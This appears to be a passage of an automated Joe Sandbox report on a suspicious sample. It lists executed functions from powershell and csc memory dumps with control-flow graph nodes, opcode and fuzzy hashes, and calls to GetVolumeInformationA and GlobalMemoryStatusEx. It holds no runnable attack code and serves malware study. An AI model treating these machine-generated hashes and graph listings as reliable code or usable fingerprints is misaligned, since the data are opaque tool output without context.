                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: N_^?$N_^E$N_^M$N_^O$N_^Q
                                                                                            • API String ID: 0-843839831
                                                                                            • Opcode ID: 253d8a79340852f9079bb2f44e2db99129d7890bd25063ba11bf7cfb13356eb0
                                                                                            • Instruction ID: 772f5a323b773234b8a17976db0f606ee9cabecac2ea6932b84550845a6c3f56
                                                                                            • Opcode Fuzzy Hash: 253d8a79340852f9079bb2f44e2db99129d7890bd25063ba11bf7cfb13356eb0
                                                                                            • Instruction Fuzzy Hash: D921E163B099364BD31AA7ACBC7A1E56790EF6033970901F7C3AAC7183ED14784742D2

                                                                                            Execution Graph

                                                                                            Execution Coverage:15.5%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:27
                                                                                            Total number of Limit Nodes:2
                                                                                            execution_graph 5260 5762258 5261 57622d0 GetVolumeInformationA 5260->5261 5263 57623d0 5261->5263 5264 5761338 5265 5760e6f 5264->5265 5268 5761ba0 5265->5268 5272 5761b91 5265->5272 5269 5761bc2 5268->5269 5276 57681d8 5269->5276 5270 5761e4c 5270->5265 5273 5761bc2 5272->5273 5275 57681d8 GlobalMemoryStatusEx 5273->5275 5274 5761e4c 5274->5265 5275->5274 5277 57681f5 5276->5277 5281 576824f 5277->5281 5285 5768260 5277->5285 5278 5768220 5278->5270 5282 5768260 5281->5282 5288 5768295 5282->5288 5283 576826e 5283->5278 5287 5768295 GlobalMemoryStatusEx 5285->5287 5286 576826e 5286->5278 5287->5286 5289 57682a5 5288->5289 5291 57682cd 5288->5291 5289->5283 5290 57682ee 5290->5283 5291->5290 5292 57683ba GlobalMemoryStatusEx 5291->5292 5293 5768404 5292->5293 5293->5283

                                                                                            Executed Functions

                                                                                            Function 05769A60 Relevance: 1.9, Strings: 1, Instructions: 695COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 365 5769a60-5769aa1 366 5769aa3 365->366 367 5769aa8-5769afb call 5768d80 call 5769030 365->367 366->367 372 5769b02-5769b1e 367->372 373 5769afd 367->373 375 5769b50-5769b5a 372->375 376 5769b20-5769b43 call 5768b40 372->376 373->372 377 5769b61-5769b7d 375->377 378 5769b5c 375->378 388 5769b48-5769b4b 376->388 381 5769b83-5769c52 call 5768b40 call 5768718 call 5768b40 377->381 382 5769c5f-5769c69 377->382 378->377 436 5769c57-5769c5a 381->436 384 5769c70-5769c8c 382->384 385 5769c6b 382->385 392 576a0e5-576a0ef 384->392 393 5769c92-5769ccb call 5762510 384->393 385->384 390 576a7a1-576a7bb 388->390 396 576a0f6-576a112 392->396 397 576a0f1 392->397 401 5769cd2-5769d1b call 5761518 393->401 402 5769ccd 393->402 403 576a2a7-576a2b1 396->403 404 576a118-576a139 396->404 397->396 419 5769ff7-576a040 401->419 420 5769d21-5769d43 401->420 402->401 409 576a2b3 403->409 410 576a2b8-576a2d4 403->410 407 576a140-576a153 404->407 408 576a13b 404->408 413 576a155 407->413 414 576a15a-576a1d0 call 5762018 call 5762510 407->414 408->407 409->410 410->390 422 576a2da-576a2e5 410->422 413->414 446 576a1d7-576a1ea 414->446 447 576a1d2 414->447 449 576a047-576a07a 419->449 450 576a042 419->450 426 5769d45 420->426 427 5769d4a-5769d5d 420->427 424 576a2e7 422->424 425 576a2ec-576a372 422->425 424->425 478 576a374 425->478 479 576a379-576a5ad call 5762510 425->479 426->427 431 5769d64-5769dfd call 5762018 call 5762510 * 2 427->431 432 5769d5f 427->432 467 5769e04-5769e28 431->467 468 5769dff 431->468 432->431 436->390 452 576a1f1-576a209 446->452 453 576a1ec 446->453 447->446 465 576a081-576a0dd call 5768b40 449->465 466 576a07c 449->466 450->449 460 576a210-576a228 452->460 461 576a20b 452->461 453->452 472 576a22f-576a242 460->472 473 576a22a 460->473 461->460 497 576a0de-576a0e0 465->497 466->465 481 5769e2f-5769e6e 467->481 482 5769e2a 467->482 468->467 475 576a244 472->475 476 576a249-576a2a2 472->476 473->472 475->476 476->390 478->479 527 576a5b4-576a5d1 479->527 528 576a5af 479->528 491 5769e75-5769e8d 481->491 492 5769e70 481->492 482->481 498 5769e94-5769ed6 491->498 499 5769e8f 491->499 492->491 497->390 503 5769edd-5769ff2 498->503 504 5769ed8 498->504 499->498 503->497 504->503 530 576a5d3 527->530 531 576a5d8-576a5f5 527->531 528->527 530->531 533 576a5f7 531->533 534 576a5fc-576a646 531->534 533->534 538 576a64d-576a66a 534->538 539 576a648 534->539 541 576a671-576a68e 538->541 542 576a66c 538->542 539->538 544 576a695-576a6b2 541->544 545 576a690 541->545 542->541 547 576a6b4 544->547 548 576a6b9-576a6d6 544->548 545->544 547->548 550 576a6dd-576a6fa 548->550 551 576a6d8 548->551 553 576a701-576a71e 550->553 554 576a6fc 550->554 551->550 556 576a725-576a742 553->556 557 576a720 553->557 554->553 559 576a744 556->559 560 576a749-576a7a0 556->560 557->556 559->560 560->390
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.4116161313.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5760000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: "
                                                                                            • API String ID: 0-123907689
                                                                                            • Opcode ID: 8204aa4a793e7f0166ac1c03f71b063ca96b87ef5162fa414d910a796df1c156
                                                                                            • Instruction ID: 06bf80b38cab993892b179b80273e5ef8cf6e0694871ab4f76bfa215c96fdca4
                                                                                            • Opcode Fuzzy Hash: 8204aa4a793e7f0166ac1c03f71b063ca96b87ef5162fa414d910a796df1c156
                                                                                            • Instruction Fuzzy Hash: E672C074A01228CFDB64DF68C954B9DBBB2BF49300F0084E9E909AB361DB319E85DF51
                                                                                            Function 05762639 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.4116161313.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5760000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: d
                                                                                            • API String ID: 0-2564639436
                                                                                            • Opcode ID: aa4ab2fd77c38f11a50ff3d34f9a22e7dee2fe1d15da1063e5630a848cad3613
                                                                                            • Instruction ID: 2951c2f2eef69e3a4796f28546f0c0b092cba604e36152a65a65eab17f8bec9a
                                                                                            • Opcode Fuzzy Hash: aa4ab2fd77c38f11a50ff3d34f9a22e7dee2fe1d15da1063e5630a848cad3613
                                                                                            • Instruction Fuzzy Hash: BF316474D062089FDB44CFA9D844BEDBBF6BF49310F04902AE905B3291DB344946DB11
                                                                                            Function 05762BE8 Relevance: .1, Instructions: 145COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.4116161313.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5760000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a8fdd50479e3db92912259f9d4b4f759fe6e8e9ba4807f3becd94a12804883f7
                                                                                            • Instruction ID: 97f12c966b10b193f7801a7bceeecbd86029e0d136fdb92a3a614b53aad5e25d
                                                                                            • Opcode Fuzzy Hash: a8fdd50479e3db92912259f9d4b4f759fe6e8e9ba4807f3becd94a12804883f7
                                                                                            • Instruction Fuzzy Hash: A3519EB4D013589FDB14CFA9D984AEDBBB5BF09300F20902AE858BB355D734A984DF58
                                                                                            Function 05762BF0 Relevance: .1, Instructions: 141COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.4116161313.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5760000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 82af8f7846b3150ba4157982133ee3bc12f6e771dbb67679bf84b034e8873313
                                                                                            • Instruction ID: 29551226608760ff71b306cc522e64fe37aae6626f4f709dd56fc7d2920ac171
                                                                                            • Opcode Fuzzy Hash: 82af8f7846b3150ba4157982133ee3bc12f6e771dbb67679bf84b034e8873313
                                                                                            • Instruction Fuzzy Hash: ED519CB4D003589FDB14CFA9D984AADFBB5BF09300F20902AE848BB355D734A984DF58
                                                                                            Function 0576224C Relevance: 1.7, APIs: 1, Instructions: 190COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 564 576224c-57623ce GetVolumeInformationA 570 57623d7-5762482 564->570 571 57623d0-57623d6 564->571 581 5762484 570->581 582 576248c-5762490 570->582 571->570 581->582 583 5762492 582->583 584 576249a-576249e 582->584 583->584 585 57624a0 584->585 586 57624a8 584->586 585->586 587 57624a9 586->587 587->587
                                                                                            APIs
                                                                                            • GetVolumeInformationA.KERNELBASE(?,?,?,?,?,?,?,?), ref: 057623BE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.4116161313.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5760000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: b308b558ceb8919d178065dc8a94c87783e193ea6c648456325aa4146b5ead47
                                                                                            • Instruction ID: 447132766ea41d49e5a74f84277448b1cdccc8299b92f415ba1b4757a396fcac
                                                                                            • Opcode Fuzzy Hash: b308b558ceb8919d178065dc8a94c87783e193ea6c648456325aa4146b5ead47
                                                                                            • Instruction Fuzzy Hash: 96719D74D012589FDB24CFA8C980BDDBBB1BF09300F209169E848B7355DB70A945DF54
                                                                                            Function 05762258 Relevance: 1.7, APIs: 1, Instructions: 184COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 588 5762258-57623ce GetVolumeInformationA 593 57623d7-5762482 588->593 594 57623d0-57623d6 588->594 604 5762484 593->604 605 576248c-5762490 593->605 594->593 604->605 606 5762492 605->606 607 576249a-576249e 605->607 606->607 608 57624a0 607->608 609 57624a8 607->609 608->609 610 57624a9 609->610 610->610
                                                                                            APIs
                                                                                            • GetVolumeInformationA.KERNELBASE(?,?,?,?,?,?,?,?), ref: 057623BE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.4116161313.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5760000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: 4ca0f2802f16ebd196d9693b7a0e7c95a63b132f0354b9e8c60e598f3cf4b9e4
                                                                                            • Instruction ID: bee0713d53dbf0f5d9fdd45c51990747734c13437886409fcb8c7962382ba35e
                                                                                            • Opcode Fuzzy Hash: 4ca0f2802f16ebd196d9693b7a0e7c95a63b132f0354b9e8c60e598f3cf4b9e4
                                                                                            • Instruction Fuzzy Hash: 09719CB4E012189FDB24CFA8C980BADBBB1BF09300F20916AE858B7355DB71A945DF54
                                                                                            Function 05768295 Relevance: 1.7, APIs: 1, Instructions: 152COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 798 5768295-57682a3 799 57682a5-57682cc call 5762bd4 798->799 800 57682cd-57682ec call 5763dfc 798->800 806 57682f2-5768351 800->806 807 57682ee-57682f1 800->807 814 5768357-5768402 GlobalMemoryStatusEx 806->814 815 5768353-5768356 806->815 818 5768404-576840a 814->818 819 576840b-576844d 814->819 818->819
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.4116161313.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5760000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1bb652f5cdf7b1fd03c7c21e4a12533e9a7a9b68c60382abd34104c6522c5a90
                                                                                            • Instruction ID: 12d45b6d9b5b9884879b25aad92c297ed2fcb39aa20c11c1ed93eda44b79dd63
                                                                                            • Opcode Fuzzy Hash: 1bb652f5cdf7b1fd03c7c21e4a12533e9a7a9b68c60382abd34104c6522c5a90
                                                                                            • Instruction Fuzzy Hash: 4751BC71E043588FCB14DFBAD8446EEBFF1AF89310F24846AE805A7261DB349945CB91
                                                                                            Function 05768370 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 823 5768370-57683b2 824 57683ba-5768402 GlobalMemoryStatusEx 823->824 825 5768404-576840a 824->825 826 576840b-576844d 824->826 825->826
                                                                                            APIs
                                                                                            • GlobalMemoryStatusEx.KERNELBASE(?), ref: 057683F2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.4116161313.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5760000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID: GlobalMemoryStatus
                                                                                            • String ID:
                                                                                            • API String ID: 1890195054-0
                                                                                            • Opcode ID: 2969aae37bbabfefd6a980ba07f43c2e7c7c8be3cf33498a7701734169566f4b
                                                                                            • Instruction ID: d3e217c249e21675fee7059ff23398e33876cbb98160ccd16001f41665db2b56
                                                                                            • Opcode Fuzzy Hash: 2969aae37bbabfefd6a980ba07f43c2e7c7c8be3cf33498a7701734169566f4b
                                                                                            • Instruction Fuzzy Hash: 2331BBB4D002589FCB10CFAAD584ADEFBF0AB49310F14806AE814B3210D774A941CF65

                                                                                            Executed Functions

                                                                                            Function 05540978 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2002004816.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_5540000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: dbq
                                                                                            • API String ID: 0-1887291361
                                                                                            • Opcode ID: 3ee08eefad6d77da6f3cd4a0c792db1686430d212e983e310c98b6a4e476776e
                                                                                            • Instruction ID: c049b0b74cdf976d7522f67a76c0f67654ec583af9bbf5d2fc1fa26436f0baff
                                                                                            • Opcode Fuzzy Hash: 3ee08eefad6d77da6f3cd4a0c792db1686430d212e983e310c98b6a4e476776e
                                                                                            • Instruction Fuzzy Hash: 75212870E112199FCF04DFA8E958AEDBBB6FB49305F205829E005B7291DB3899448F65
                                                                                            Function 05540988 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2002004816.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_5540000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: dbq
                                                                                            • API String ID: 0-1887291361
                                                                                            • Opcode ID: ab40d60c35ea35e843672f440b5540931a47af42b48f93cdaf4b5bf0fbe1b5b2
                                                                                            • Instruction ID: 35a0c59e41090aa47b79388a0531ee37df2704f2383b16267b55da0436e3015a
                                                                                            • Opcode Fuzzy Hash: ab40d60c35ea35e843672f440b5540931a47af42b48f93cdaf4b5bf0fbe1b5b2
                                                                                            • Instruction Fuzzy Hash: 05214A70E112099FCF04DFA9E448AEDBBB6FB49305F205429E505B73A1DB389944CF65
                                                                                            Function 055408F1 Relevance: .0, Instructions: 24COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2002004816.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_5540000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f6034a659b6a8b2ff427fe2a852067f90d8a27c1fde4f6fa0f85dc88ade5ba88
                                                                                            • Instruction ID: 6b65a1730d18841065b9aa95233ba9f7ec8e32b17034378ad6200152af04578d
                                                                                            • Opcode Fuzzy Hash: f6034a659b6a8b2ff427fe2a852067f90d8a27c1fde4f6fa0f85dc88ade5ba88
                                                                                            • Instruction Fuzzy Hash: C3F0E530A062489FCB01DBB8F6186DC7FB0FF01214B114AAAD014972D1CB305E54CB00
                                                                                            Function 05540900 Relevance: .0, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2002004816.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_5540000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 575cc9e88d376c87ca386182efe57d994ddc7c897240f7ecff69f8c90dad40db
                                                                                            • Instruction ID: d33020274d900e7e877dcc0bc0f2ebf36da919a7791254d42bc4ce2b4f83b8a2
                                                                                            • Opcode Fuzzy Hash: 575cc9e88d376c87ca386182efe57d994ddc7c897240f7ecff69f8c90dad40db
                                                                                            • Instruction Fuzzy Hash: 11E04630A0220DEFCB04EFA8E509ADDBBB9FB05304F6045A9E40597250EF716E00DB90

                                                                                            Executed Functions

                                                                                            Function 04DA0978 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2077161200.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_4da0000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: dbq
                                                                                            • API String ID: 0-1887291361
                                                                                            • Opcode ID: 200b7fc06d098eb3182e85e14729bb8627be47a0a003e29163b56ead7313d50c
                                                                                            • Instruction ID: dbd0a99ef46d8131e35ae19beb3340f3e0542dad9a2256fc28b6645921570f21
                                                                                            • Opcode Fuzzy Hash: 200b7fc06d098eb3182e85e14729bb8627be47a0a003e29163b56ead7313d50c
                                                                                            • Instruction Fuzzy Hash: 83217C70E01219AFDB05DFB8E864AEDBBF5FB49304F005428E405B7390DB38A945CBA5
                                                                                            Function 04DA0988 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2077161200.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_4da0000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: dbq
                                                                                            • API String ID: 0-1887291361
                                                                                            • Opcode ID: 5b4eb693ca7dc0637f8b9f31654b8b3ff06b3290f10e967ecf82b76f0aee6d33
                                                                                            • Instruction ID: 0022c1ec1700377e757cc1033f4cd200c7d405d0696d9fb410cae0e31aa20a81
                                                                                            • Opcode Fuzzy Hash: 5b4eb693ca7dc0637f8b9f31654b8b3ff06b3290f10e967ecf82b76f0aee6d33
                                                                                            • Instruction Fuzzy Hash: 99212870E012099FEB05DFA8E464AEDBBF5FB4A315F105528E405B3390DB38A945CB65
                                                                                            Function 04DA08F1 Relevance: .0, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2077161200.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_4da0000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ad5dd5a7109322da31b75e2ad12f772db72ef4d1e89d2152bf16934ac1828369
                                                                                            • Instruction ID: 05ba42f1c13ca764c292e88ea6c72a0e3e71fb7548bfc30f70b23e2d3ffff322
                                                                                            • Opcode Fuzzy Hash: ad5dd5a7109322da31b75e2ad12f772db72ef4d1e89d2152bf16934ac1828369
                                                                                            • Instruction Fuzzy Hash: 6FE0E571A0020DEFD701EBA8F45569C7778EB41314F000265D40193251EE756F05CB51
                                                                                            Function 04DA0900 Relevance: .0, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2077161200.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_4da0000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a6be403989b82daa68298aec8490f487a3916ac260e006660a238078a4cbb124
                                                                                            • Instruction ID: f17c3ecf3061ef30dfadb057a98ea9feb8acd7f506df4869fd8279dea552b61e
                                                                                            • Opcode Fuzzy Hash: a6be403989b82daa68298aec8490f487a3916ac260e006660a238078a4cbb124
                                                                                            • Instruction Fuzzy Hash: F1E04F30601209EFDB01EFACF51565DB7B9EB45304F404568D80593354DF756E00DB51